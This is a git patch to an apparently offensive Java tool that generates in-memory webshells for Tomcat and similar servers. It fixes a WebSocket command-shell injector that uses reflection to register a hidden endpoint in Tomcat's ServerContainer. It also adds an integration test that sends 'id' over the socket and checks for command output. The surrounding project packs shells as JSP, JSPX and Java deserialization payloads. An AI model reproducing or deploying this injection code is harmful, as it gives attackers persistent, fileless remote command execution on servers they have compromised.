From 85828f797531b5c328ee160d83a0e5ae3018d676 Mon Sep 17 00:00:00 2001 From: ReaJason Date: Tue, 25 Feb 2025 00:11:16 +0800 Subject: [PATCH] fix: tomcat WebSocket shell not work (#25) --- .../memshell/generator/CommandGenerator.java | 20 +++--- .../integration/ShellAssertionTool.java | 70 +++++++++++++++++-- .../tomcat/Tomcat8ContainerTest.java | 7 +- .../tomcat/TomcatWebSocketInjector.java | 4 +- .../shelltool/command/CommandWebSocket.java | 1 - 5 files changed, 82 insertions(+), 20 deletions(-) diff --git a/generator/src/main/java/com/reajason/javaweb/memshell/generator/CommandGenerator.java b/generator/src/main/java/com/reajason/javaweb/memshell/generator/CommandGenerator.java index ea7ce018..ce740d4d 100644 --- a/generator/src/main/java/com/reajason/javaweb/memshell/generator/CommandGenerator.java +++ b/generator/src/main/java/com/reajason/javaweb/memshell/generator/CommandGenerator.java @@ -9,6 +9,7 @@ import com.reajason.javaweb.memshell.config.CommandConfig; import com.reajason.javaweb.memshell.config.ShellConfig; import net.bytebuddy.ByteBuddy; import net.bytebuddy.dynamic.DynamicType; +import org.apache.commons.lang3.StringUtils; import java.util.HashMap; @@ -38,14 +39,17 @@ public class CommandGenerator { builder = LogRemoveMethodVisitor.extend(builder); } - if (config.getShellType().startsWith(ShellType.AGENT)) { - builder = builder.visit( - new LdcReAssignVisitorWrapper(new HashMap(3) {{ - put("paramName", shellConfig.getParamName()); - }}) - ); - } else { - builder = builder.field(named("paramName")).value(shellConfig.getParamName()); + String shellType = config.getShellType(); + if (!ShellType.WEBSOCKET.equals(shellType)) { + if (StringUtils.startsWith(shellType, ShellType.AGENT)) { + builder = builder.visit( + new LdcReAssignVisitorWrapper(new HashMap(1) {{ + put("paramName", shellConfig.getParamName()); + }}) + ); + } else { + builder = builder.field(named("paramName")).value(shellConfig.getParamName()); + } } try (DynamicType.Unloaded make = builder.make()) { diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java b/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java index f220b8a6..16969750 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertionTool.java @@ -13,7 +13,9 @@ import okhttp3.HttpUrl; import okhttp3.OkHttpClient; import okhttp3.Request; import okhttp3.Response; -import org.junit.jupiter.api.Assumptions; +import org.java_websocket.client.WebSocketClient; +import org.java_websocket.handshake.ServerHandshake; +import org.junit.jupiter.api.Test; import org.testcontainers.containers.GenericContainer; import org.testcontainers.shaded.org.apache.commons.io.FileUtils; import org.testcontainers.shaded.org.apache.commons.lang3.RandomStringUtils; @@ -21,16 +23,18 @@ import org.testcontainers.shaded.org.apache.commons.lang3.StringUtils; import org.testcontainers.utility.MountableFile; import java.io.IOException; +import java.net.URI; +import java.net.URL; import java.nio.file.Files; import java.nio.file.Path; -import java.nio.file.Paths; import java.util.Objects; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.TimeUnit; import static org.hamcrest.CoreMatchers.anyOf; import static org.hamcrest.CoreMatchers.containsString; import static org.hamcrest.MatcherAssert.assertThat; -import static org.junit.jupiter.api.Assertions.assertDoesNotThrow; -import static org.junit.jupiter.api.Assertions.assertTrue; +import static org.junit.jupiter.api.Assertions.*; /** * @author ReaJason @@ -57,6 +61,12 @@ public class ShellAssertionTool { shellUrl = url + urlPattern; } + if (shellType.equals(ShellType.WEBSOCKET)) { + urlPattern = "/" + shellTool + shellType + packer.name(); + URL url1 = new URL(url); + shellUrl = "ws://" + url1.getHost() + ":" + url1.getPort() + url1.getPath() + urlPattern; + } + GenerateResult generateResult = generate(urlPattern, server, shellType, shellTool, targetJdkVersion, packer); String content = null; @@ -87,7 +97,11 @@ public class ShellAssertionTool { testGodzillaIsOk(shellUrl, ((GodzillaConfig) generateResult.getShellToolConfig())); break; case Command: - testCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig())); + if (shellType.equals(ShellType.WEBSOCKET)) { + testWebSocketCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig())); + } else { + testCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig())); + } break; case Behinder: testBehinderIsOk(shellUrl, ((BehinderConfig) generateResult.getShellToolConfig())); @@ -131,6 +145,50 @@ public class ShellAssertionTool { } } + @Test + void name() throws Exception { + testWebSocketCommandIsOk("ws://localhost:8082/app/hello", null); + } + + public static void testWebSocketCommandIsOk(String entrypoint, CommandConfig shellConfig) throws Exception { + final CountDownLatch latch = new CountDownLatch(1); + final String[] responseHolder = new String[1]; + final long timeout = 5; + + WebSocketClient client = new WebSocketClient(new URI(entrypoint)) { + @Override + public void onOpen(ServerHandshake data) { + send("id"); + } + + @Override + public void onMessage(String message) { + responseHolder[0] = message; + latch.countDown(); + close(); + } + + @Override + public void onClose(int code, String reason, boolean remote) { + } + + @Override + public void onError(Exception ex) { + } + }; + + client.connect(); + + boolean connected = latch.await(timeout, TimeUnit.SECONDS); + if (!connected) { + fail("连接超时,未能成功连接到 WebSocket 服务器"); + } + + String res = responseHolder[0]; + System.out.println(res); + assertTrue(res.contains("uid=")); + } + public static void testBehinderIsOk(String entrypoint, BehinderConfig shellConfig) { BehinderManager behinderManager = BehinderManager.builder() .entrypoint(entrypoint).pass(shellConfig.getPass()) @@ -167,7 +225,7 @@ public class ShellAssertionTool { .build(); ShellToolConfig shellToolConfig = null; - String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5)+ shellType + RandomStringUtils.randomAlphabetic(5)+ packer.name(); + String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5) + shellType + RandomStringUtils.randomAlphabetic(5) + packer.name(); switch (shellTool) { case Godzilla: String godzillaPass = "pass"; diff --git a/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8ContainerTest.java b/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8ContainerTest.java index faa6cc85..89513773 100644 --- a/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8ContainerTest.java +++ b/integration-test/src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8ContainerTest.java @@ -1,10 +1,10 @@ package com.reajason.javaweb.integration.tomcat; import com.reajason.javaweb.integration.TestCasesProvider; -import com.reajason.javaweb.memshell.ShellType; +import com.reajason.javaweb.memshell.Packers; import com.reajason.javaweb.memshell.Server; import com.reajason.javaweb.memshell.ShellTool; -import com.reajason.javaweb.memshell.Packers; +import com.reajason.javaweb.memshell.ShellType; import lombok.extern.slf4j.Slf4j; import net.bytebuddy.jar.asm.Opcodes; import org.junit.jupiter.api.AfterAll; @@ -23,7 +23,6 @@ import static com.reajason.javaweb.integration.ContainerTool.*; import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException; import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk; import static org.hamcrest.MatcherAssert.assertThat; -import static org.junit.jupiter.params.provider.Arguments.arguments; /** * @author ReaJason @@ -44,7 +43,7 @@ public class Tomcat8ContainerTest { static Stream casesProvider() { Server server = Server.Tomcat; - Set supportedShellTypes = Set.of(ShellType.FILTER, ShellType.LISTENER, ShellType.VALVE, + Set supportedShellTypes = Set.of(ShellType.FILTER, ShellType.LISTENER, ShellType.VALVE, ShellType.WEBSOCKET, ShellType.AGENT_FILTER_CHAIN, ShellType.CATALINA_AGENT_CONTEXT_VALVE); Set testPackers = Set.of(Packers.JSP, Packers.JSPX, Packers.JavaDeserialize); return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers); diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketInjector.java b/memshell/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketInjector.java index 4b7b8287..9d69ce5b 100644 --- a/memshell/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketInjector.java +++ b/memshell/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatWebSocketInjector.java @@ -87,7 +87,7 @@ public class TomcatWebSocketInjector { @SuppressWarnings("unchecked") - private void inject(Object context, Object obj) throws Exception { + private void inject(Object obj, Object context) throws Exception { Object servletContext = invokeMethod(context, "getServletContext", null, null); Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"}); if (container == null) { @@ -103,9 +103,11 @@ public class TomcatWebSocketInjector { Map o = (Map) getFieldValue(container, "configExactMatchMap"); if (o.containsKey(getUrlPattern())) { + System.out.println("websocket at " + getUrlPattern() + " already exists"); return; } invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig}); + System.out.println("websocket at " + getUrlPattern() + " inject successfully"); } @SuppressWarnings("all") diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandWebSocket.java b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandWebSocket.java index b39859d8..1d0b81b8 100644 --- a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandWebSocket.java +++ b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandWebSocket.java @@ -14,7 +14,6 @@ import java.io.InputStream; */ public class CommandWebSocket extends Endpoint implements MessageHandler.Whole { - public static String paramName; private Session session; @Override